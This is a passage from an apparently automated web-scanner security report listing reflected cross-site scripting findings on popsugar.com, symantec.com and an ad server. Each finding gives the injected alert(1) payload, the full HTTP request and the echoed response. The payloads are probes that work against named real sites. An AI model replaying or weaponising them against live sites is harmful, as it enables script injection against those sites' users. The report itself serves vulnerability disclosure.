Set-Cookie: ss1=0%7C1317831686%7CpkptR%2FA9J%2FIqOT1%2FNXZ2n3QzQ3z9KzL8JzqNOXzhPCUOXdBu6NS1b%2F3LUa8GKOLImxVmk7YfvLibUFzSqe5Q%2B7%2BoVuuMa7MtnWxeLZvLkI0rcDOFt58RkZNzXW2qbFry5plWRfKYqFDBw4BBEwsyl3s5Am93doYXCHQyo1EcDOCL1roLiKJwo2kG02GMlhGxN7k3D4PUL585q5xETKDblw%3D%3D%7C429f67101424c290012240d8a56cca4712884354; expires=Wed, 05-Oct-2011 16:21:26 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<script>
var comscoreHash = "7c5700a02ac753aeb1b48be93ede5569";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.popsugar.com/ajaxharness1274b"-alert(1)-"faa5baba69b",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.133. http://www.popsugar.com/community/welcome [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71fc3"-alert(1)-"b26aaabc6d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /community71fc3"-alert(1)-"b26aaabc6d1/welcome HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 214880
Date: Mon, 12 Sep 2011 12:48:13 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831693%7Cr9dhWypY6jg0x26vr4FaUOqhCsFOKHx5a%2Bq2ZDd%2BTfxw08HKOoJMNBXIB2hhcFDYnBzwi8s3IVNfYgNmYEw%2BLksmQfw08uQ6pxsGEBhnj9JcmGg5BFRhwDUwk88E51%2BnDwBluagi98uxF2qU8Lcnq%2BREdgQf3pT2oh7xtrjQAcl9H8hYmTA%2FNyOK2rW22dQT%2B5nTWh2raVfAbMmHLd%2Fk%2BQ%3D%3D%7C7aa075b627ef874e5acd15c901cd009ba793cf8b; expires=Wed, 05-Oct-2011 16:21:33 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<script>
var comscoreHash = "7c5700a02ac753aeb1b48be93ede5569";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.popsugar.com/community71fc3"-alert(1)-"b26aaabc6d1/welcome",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.134. http://www.popsugar.com/community/welcome [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dc10"><script>alert(1)</script>52e78853112 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community8dc10"><script>alert(1)</script>52e78853112/welcome HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web019-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 215025
Date: Mon, 12 Sep 2011 12:48:11 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831691%7CEDANpUBXj7Tgv43AmGrEhzEQXWyNeG0H2zRof%2FnyvlEl%2BPoC%2FCdYmxgnkumTYWRDyf16qQRZZWKmfWgsLDfCNJztLyezVjGPrXBnIdPU%2FijnixGFkQYw17y9MdoPtfcAKuYEXGj1y6pmNeONBafiaAclYS69eompF4MBmzqpl6ELuA2SXF9YYcuAaG5rOfCALG8nlaGApmcVl%2FDZLDHLpw%3D%3D%7Cdc8ded20b853356648daf3e5c9a44561e3044fcd; expires=Wed, 05-Oct-2011 16:21:31 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<link rel="canonical" href="http://www.popsugar.com/community8dc10"><script>alert(1)</script>52e78853112/welcome">
...[SNIP]...

2.135. http://www.popsugar.com/community/welcome [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9aea"-alert(1)-"a554c76626d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /community/welcomef9aea"-alert(1)-"a554c76626d HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 149935
Date: Mon, 12 Sep 2011 12:49:00 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831740%7CPBu6CHBL%2BNPiJ%2BO0b88VGrbPoavruFNqnmlHvuiyu5RAZ8RbrX4MARzW6UPUI4XAzUuUWIKcevcUd75sOIG7vbWCJmfKPIEgOL7cKSF5iS4%2FtvU79e%2BjOKK3juIM7eHeBEDUqSSYOB%2Bm3H7BlJevZtX6AFsSQFzsbM7h9PjEi57L3o59zDb70XFiwzNQNbEBhkqvX%2F5U2G%2B34iy8gxYO4g%3D%3D%7C6dabb54501a683def6c8a84c7f24d6fa0e681d28; expires=Wed, 05-Oct-2011 16:22:20 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<script>
var comscoreHash = "7c5700a02ac753aeb1b48be93ede5569";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.popsugar.com/community/welcomef9aea"-alert(1)-"a554c76626d",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.136. http://www.popsugar.com/community/welcome [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e939"><script>alert(1)</script>5f0bb92b79e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community/welcome4e939"><script>alert(1)</script>5f0bb92b79e HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 150250
Date: Mon, 12 Sep 2011 12:48:23 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831703%7CoAutIUEcXq6bCNfw74vX3a0be04ZbR4xtUo1MkM2Wd11jXYyJcUAEBZW4wg1XBM9frctMhBcgKvcWELTBl%2FmSMz8iU8UXP3HuedsTL3oNeYUELTy8uSkwVNdGNj8TtYYoOq1UoQzUrLsQjAK6FKYwd2IUdA5MzeD0wF3ZgDFwzcJUej1ChSFZzPRc1Svasm3z2LxMdUMOWcSToydDAcpMg%3D%3D%7Cce8ce4960372de566ad8f2cb9b30c00a80876c77; expires=Wed, 05-Oct-2011 16:21:43 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<link rel="canonical" href="http://www.popsugar.com/community/welcome4e939"><script>alert(1)</script>5f0bb92b79e">
...[SNIP]...

2.137. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de3fe'-alert(1)-'2de55c2ee7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sitesde3fe'-alert(1)-'2de55c2ee7c/default/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:14 +0000
Vary: Cookie
ETag: "1315831694"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777241
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sitesde3fe'-alert(1)-'2de55c2ee7c/default/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.138. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85ada'-alert(1)-'a74af1a6694 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default85ada'-alert(1)-'a74af1a6694/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:18 +0000
Vary: Cookie
ETag: "1315831698"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777346
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default85ada'-alert(1)-'a74af1a6694/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.139. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b374'-alert(1)-'f947be7dc9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes4b374'-alert(1)-'f947be7dc9/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:22 +0000
Vary: Cookie
ETag: "1315831702"
Content-Type: text/html; charset=utf-8
Content-Length: 29494
X-Varnish: 1371255077
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes4b374'-alert(1)-'f947be7dc9/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.140. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e5b9'-alert(1)-'74a67864f83 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect28e5b9'-alert(1)-'74a67864f83/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:28 +0000
Vary: Cookie
ETag: "1315831708"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777530
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect28e5b9'-alert(1)-'74a67864f83/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.141. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d05b9'-alert(1)-'cfeabf464ec was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/imagesd05b9'-alert(1)-'cfeabf464ec/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:32 +0000
Vary: Cookie
ETag: "1315831712"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777597
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/imagesd05b9'-alert(1)-'cfeabf464ec/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.142. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69951'-alert(1)-'8f65520acae was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/images/favicon.ico69951'-alert(1)-'8f65520acae HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:36 +0000
Vary: Cookie
ETag: "1315831716"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777663
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=1800
Date: Mon, 12 Sep 2011 12:48:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico69951'-alert(1)-'8f65520acae';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.143. http://adserving.cpxinteractive.com/st [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4c31'-alert(1)-'1769fa3b869 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e4c31'-alert(1)-'1769fa3b869
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:49:32 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:32 GMT
Content-Length: 474

